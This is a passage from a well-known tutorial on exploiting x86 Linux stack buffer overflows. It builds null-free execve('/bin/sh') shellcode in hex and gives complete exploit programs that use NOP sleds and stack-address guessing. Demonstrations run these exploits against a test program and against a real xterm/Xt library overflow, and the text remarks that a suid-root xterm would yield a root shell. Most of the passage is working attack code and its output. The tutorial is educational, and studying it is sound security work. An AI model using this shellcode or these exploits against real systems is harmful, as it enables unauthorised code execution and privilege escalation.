the address of the null pointer into %edx. 0x80002ce <__execve+18>: int $0x80 Change into kernel mode. ------------------------------------------------------------------------------ So as we can see there is not much to the execve() system call. All we need to do is: a) Have the null terminated string "/bin/sh" somewhere in memory. b) Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c) Copy 0xb into the EAX register. d) Copy the address of the address of the string "/bin/sh" into the EBX register. e) Copy the address of the string "/bin/sh" into the ECX register. f) Copy the address of the null long word into the EDX register. g) Execute the int $0x80 instruction. But what if the execve() call fails for some reason? The program will continue fetching instructions from the stack, which may contain random data! The program will most likely core dump. We want the program to exit cleanly if the execve syscall fails. To accomplish this we must then add a exit syscall after the execve syscall. What does the exit syscall looks like? exit.c ------------------------------------------------------------------------------ #include void main() { exit(0); } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) disassemble _exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp,%ebp 0x800034f <_exit+3>: pushl %ebx 0x8000350 <_exit+4>: movl $0x1,%eax 0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx 0x8000358 <_exit+12>: int $0x80 0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx 0x800035d <_exit+17>: movl %ebp,%esp 0x800035f <_exit+19>: popl %ebp 0x8000360 <_exit+20>: ret 0x8000361 <_exit+21>: nop 0x8000362 <_exit+22>: nop 0x8000363 <_exit+23>: nop End of assembler dump. ------------------------------------------------------------------------------ The exit syscall will place 0x1 in EAX, place the exit code in EBX, and execute "int 0x80". That's it. Most applications return 0 on exit to indicate no errors. We will place 0 in EBX. Our list of steps is now: a) Have the null terminated string "/bin/sh" somewhere in memory. b) Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c) Copy 0xb into the EAX register. d) Copy the address of the address of the string "/bin/sh" into the EBX register. e) Copy the address of the string "/bin/sh" into the ECX register. f) Copy the address of the null long word into the EDX register. g) Execute the int $0x80 instruction. h) Copy 0x1 into the EAX register. i) Copy 0x0 into the EBX register. j) Execute the int $0x80 instruction. Trying to put this together in assembly language, placing the string after the code, and remembering we will place the address of the string, and null word after the array, we have: ------------------------------------------------------------------------------ movl string_addr,string_addr_addr movb $0x0,null_byte_addr movl $0x0,null_addr movl $0xb,%eax movl string_addr,%ebx leal string_addr,%ecx leal null_string,%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 /bin/sh string goes here. ------------------------------------------------------------------------------ The problem is that we don't know where in the memory space of the program we are trying to exploit the code (and the string that follows it) will be placed. One way around it is to use a JMP, and a CALL instruction. The JMP and CALL instructions can use IP relative addressing, which means we can jump to an offset from the current IP without needing to know the exact address of where in memory we want to jump to. If we place a CALL instruction right before the "/bin/sh" string, and a JMP instruction to it, the strings address will be pushed onto the stack as the return address when CALL is executed. All we need then is to copy the return address into a register. The CALL instruction can simply call the start of our code above. Assuming now that J stands for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow would now be: bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory buffer sfp ret a b c <------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^ ^| | |||_____________||____________| (1) (2) ||_____________|| |______________| (3) top of bottom of stack stack With this modifications, using indexed addressing, and writing down how many bytes each instruction takes our code looks like: ------------------------------------------------------------------------------ jmp offset-to-call # 2 bytes popl %esi # 1 byte movl %esi,array-offset(%esi) # 3 bytes movb $0x0,nullbyteoffset(%esi)# 4 bytes movl $0x0,null-offset(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal array-offset,(%esi),%ecx # 3 bytes leal null-offset(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call offset-to-popl # 5 bytes /bin/sh string goes here. ------------------------------------------------------------------------------ Calculating the offsets from jmp to call, from call to popl, from the string address to the array, and from the string address to the null long word, we now have: ------------------------------------------------------------------------------ jmp 0x26 # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2b # 5 bytes .string \"/bin/sh\" # 8 bytes ------------------------------------------------------------------------------ Looks good. To make sure it works correctly we must compile it and run it. But there is a problem. Our code modifies itself, but most operating system mark code pages read-only. To get around this restriction we must place the code we wish to execute in the stack or data segment, and transfer control to it. To do so we will place our code in a global array in the data segment. We need first a hex representation of the binary code. Lets compile it first, and then use gdb to obtain it. shellcodeasm.c ------------------------------------------------------------------------------ void main() { __asm__(" jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes .string \"/bin/sh\" # 8 bytes "); } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c [aleph1]$ gdb shellcodeasm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (gdb) disassemble main Dump of assembler code for function main: 0x8000130
: pushl %ebp 0x8000131 : movl %esp,%ebp 0x8000133 : jmp 0x800015f 0x8000135 : popl %esi 0x8000136 : movl %esi,0x8(%esi) 0x8000139 : movb $0x0,0x7(%esi) 0x800013d : movl $0x0,0xc(%esi) 0x8000144 : movl $0xb,%eax 0x8000149 : movl %esi,%ebx 0x800014b : leal 0x8(%esi),%ecx 0x800014e : leal 0xc(%esi),%edx 0x8000151 : int $0x80 0x8000153 : movl $0x1,%eax 0x8000158 : movl $0x0,%ebx 0x800015d : int $0x80 0x800015f : call 0x8000135 0x8000164 : das 0x8000165 : boundl 0x6e(%ecx),%ebp 0x8000168 : das 0x8000169 : jae 0x80001d3 <__new_exitfn+55> 0x800016b : addb %cl,0x55c35dec(%ecx) End of assembler dump. (gdb) x/bx main+3 0x8000133 : 0xeb (gdb) 0x8000134 : 0x2a (gdb) . . . ------------------------------------------------------------------------------ testsc.c ------------------------------------------------------------------------------ char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ gcc -o testsc testsc.c [aleph1]$ ./testsc $ exit [aleph1]$ ------------------------------------------------------------------------------ It works! But there is an obstacle. In most cases we'll be trying to overflow a character buffer. As such any null bytes in our shellcode will be considered the end of the string, and the copy will be terminated. There must be no null bytes in the shellcode for the exploit to work. Let's try to eliminate the bytes (and at the same time make it smaller). Problem instruction: Substitute with: -------------------------------------------------------- movb $0x0,0x7(%esi) xorl %eax,%eax molv $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) -------------------------------------------------------- movl $0xb,%eax movb $0xb,%al -------------------------------------------------------- movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax -------------------------------------------------------- Our improved code: shellcodeasm2.c ------------------------------------------------------------------------------ void main() { __asm__(" jmp 0x1f # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes xorl %eax,%eax # 2 bytes movb %eax,0x7(%esi) # 3 bytes movl %eax,0xc(%esi) # 3 bytes movb $0xb,%al # 2 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes xorl %ebx,%ebx # 2 bytes movl %ebx,%eax # 2 bytes inc %eax # 1 bytes int $0x80 # 2 bytes call -0x24 # 5 bytes .string \"/bin/sh\" # 8 bytes # 46 bytes total "); } ------------------------------------------------------------------------------ And our new test program: testsc2.c ------------------------------------------------------------------------------ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ gcc -o testsc2 testsc2.c [aleph1]$ ./testsc2 $ exit [aleph1]$ ------------------------------------------------------------------------------ Writing an Exploit ~~~~~~~~~~~~~~~~~~ (or how to mung the stack) ~~~~~~~~~~~~~~~~~~~~~~~~~~ Lets try to pull all our pieces together. We have the shellcode. We know it must be part of the string which we'll use to overflow the buffer. We know we must point the return address back into the buffer. This example will demonstrate these points: overflow1.c ------------------------------------------------------------------------------ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ gcc -o exploit1 exploit1.c [aleph1]$ ./exploit1 $ exit exit [aleph1]$ ------------------------------------------------------------------------------ What we have done above is filled the array large_string[] with the address of buffer[], which is where our code will be. Then we copy our shellcode into the beginning of the large_string string. strcpy() will then copy large_string onto buffer without doing any bounds checking, and will overflow the return address, overwriting it with the address where our code is now located. Once we reach the end of main and it tried to return it jumps to our code, and execs a shell. The problem we are faced when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address. Most programs do not push more than a few hundred or a few thousand bytes into the stack at any one time. Therefore by knowing where the stack starts we can try to guess where the buffer we are trying to overflow will be. Here is a little program that will print its stack pointer: sp.c ------------------------------------------------------------------------------ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main() { printf("0x%x\n", get_sp()); } ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ [aleph1]$ ./sp 0x8000470 [aleph1]$ ------------------------------------------------------------------------------ Lets assume this is the program we are trying to overflow is: vulnerable.c ------------------------------------------------------------------------------ void main(int argc, char *argv[]) { char buffer[512]; if (argc > 1) strcpy(buffer,argv[1]); } ------------------------------------------------------------------------------ We can create a program that takes as a parameter a buffer size, and an offset from its own stack pointer (where we believe the buffer we want to overflow may live). We'll put the overflow string in an environment variable so it is easy to manipulate: exploit2.c ------------------------------------------------------------------------------ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr += 4; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); } ------------------------------------------------------------------------------ Now we can try to guess what the buffer and offset should be: ------------------------------------------------------------------------------ [aleph1]$ ./exploit2 500 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG [aleph1]$ exit [aleph1]$ ./exploit2 600 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG Illegal instruction [aleph1]$ exit [aleph1]$ ./exploit2 600 100 Using address: 0xbffffd4c [aleph1]$ ./vulnerable $EGG Segmentation fault [aleph1]$ exit [aleph1]$ ./exploit2 600 200 Using address: 0xbffffce8 [aleph1]$ ./vulnerable $EGG Segmentation fault [aleph1]$ exit . . . [aleph1]$ ./exploit2 600 1564 Using address: 0xbffff794 [aleph1]$ ./vulnerable $EGG $ ------------------------------------------------------------------------------ As we can see this is not an efficient process. Trying to guess the offset even while knowing where the beginning of the stack lives is nearly impossible. We would need at best a hundred tries, and at worst a couple of thousand. The problem is we need to guess *exactly* where the address of our code will start. If we are off by one byte more or less we will just get a segmentation violation or a invalid instruction. One way to increase our chances is to pad the front of our overflow buffer with NOP instructions. Almost all processors have a NOP instruction that performs a null operation. It is usually used to delay execution for purposes of timing. We will take advantage of it and fill half of our overflow buffer with them. We will place our shellcode at the center, and then follow it with the return addresses. If we are lucky and the return address points anywhere in the string of NOPs, they will just get executed until they reach our code. In the Intel architecture the NOP instruction is one byte long and it translates to 0x90 in machine code. Assuming the stack starts at address 0xFF, that S stands for shell code, and that N stands for a NOP instruction the new stack would look like this: bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory buffer sfp ret a b c <------ [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE] ^ | |_____________________| top of bottom of stack stack The new exploits is then: exploit3.c ------------------------------------------------------------------------------ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); } ------------------------------------------------------------------------------ A good selection for our buffer size is about 100 bytes more than the size of the buffer we are trying to overflow. This will place our code at the end of the buffer we are trying to overflow, giving a lot of space for the NOPs, but still overwriting the return address with the address we guessed. The buffer we are trying to overflow is 512 bytes long, so we'll use 612. Let's try to overflow our test program with our new exploit: ------------------------------------------------------------------------------ [aleph1]$ ./exploit3 612 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG $ ------------------------------------------------------------------------------ Whoa! First try! This change has improved our chances a hundredfold. Let's try it now on a real case of a buffer overflow. We'll use for our demonstration the buffer overflow on the Xt library. For our example, we'll use xterm (all programs linked with the Xt library are vulnerable). You must be running an X server and allow connections to it from the localhost. Set your DISPLAY variable accordingly. ------------------------------------------------------------------------------ [aleph1]$ export DISPLAY=:0.0 [aleph1]$ ./exploit3 1124 Using address: 0xbffffdb4 [aleph1]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤ ¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ ^C [aleph1]$ exit [aleph1]$ ./exploit3 2148 100 Using address: 0xbffffd48 [aleph1]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H ¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿ H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ Warning: some arguments in previous message were lost Illegal instruction [aleph1]$ exit . . . [aleph1]$ ./exploit4 2148 600 Using address: 0xbffffb54 [aleph1]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/shûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tû ÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿T ûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿ Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ Warning: some arguments in previous message were lost bash$ ------------------------------------------------------------------------------ Eureka! Less than a dozen tries and we found the magic numbers. If xterm where installed suid root this would now be a root shell. Small Buffer Overflows ~~~~~~~~~~~~~~~~~~~~~~ There will be times when the buffer you are trying to overflow is so small that either the shellcode 